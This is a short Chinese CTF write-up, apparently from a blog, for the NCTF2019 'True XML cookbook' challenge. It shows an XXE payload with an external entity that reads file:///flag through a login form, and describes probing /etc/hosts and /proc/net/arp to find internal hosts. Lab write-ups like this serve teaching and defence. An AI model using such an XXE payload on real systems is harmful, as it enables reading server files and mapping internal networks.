0
点赞
收藏
分享

微信扫一扫

[NCTF2019]True XML cookbook 1

王传学 2022-05-05 阅读 18
xmllinqp2p

又是一道关于XML注入的题

xml语法:

<?xml version="1.0" encoding="UTF-8"?>  //xml声明

<!DOCTYPE copyright [        //DTD(文档类型定义)

<!ELEMENT note (to,reset,login)>   //定义元素

<!ENTITY test SYSTEM "url">        //定义外部实体test

]>

直接抓包!

<?xml version="1.0" ?>
<!DOCTYPE note [      //note可以随意的值
<!ENTITY snowlyzz SYSTEM "file:///flag">   //定义外部实体test
]>
<user>
<username>&snowlyzz;</username>
<password>123456</password>
</user>

报错了

 看看其他路径下的内容

 /etc/hosts 下只有报错内容

 试试/proc/net/arp

 爆装备了!

接下来访问对方IP就能获得到flag

关于XXE漏洞的全部内容:XXE

举报

相关推荐

[NCTF2019]Fake XML cookbook XML注入

spring

[NCTF2019]Fake XML cookbook(特详解)

xml

buuctf-[NCTF2019]Fake XML cookbook(小宇特详解)

xmlphpweb安全

[NCTF2019]SQLi

安全

[NCTF2019]SQLi regexp 盲注

php

web.xml is missing and <failOnMissingWebXml> is set to true

mavenweb.xml解决方案报错信息虚拟化云计算

(a== 1 && a ==2 && a==3)可能为true吗?

jsJava web

如何实现a===1 && a===2 && a===3返回true?

数组i++目标对象编程语言

OpenGL_4.0_Shading_Language_Cookbook 读书笔记(1)

opengl游戏开发#include下载地址

xml version=1

xmljavaspring
0 条评论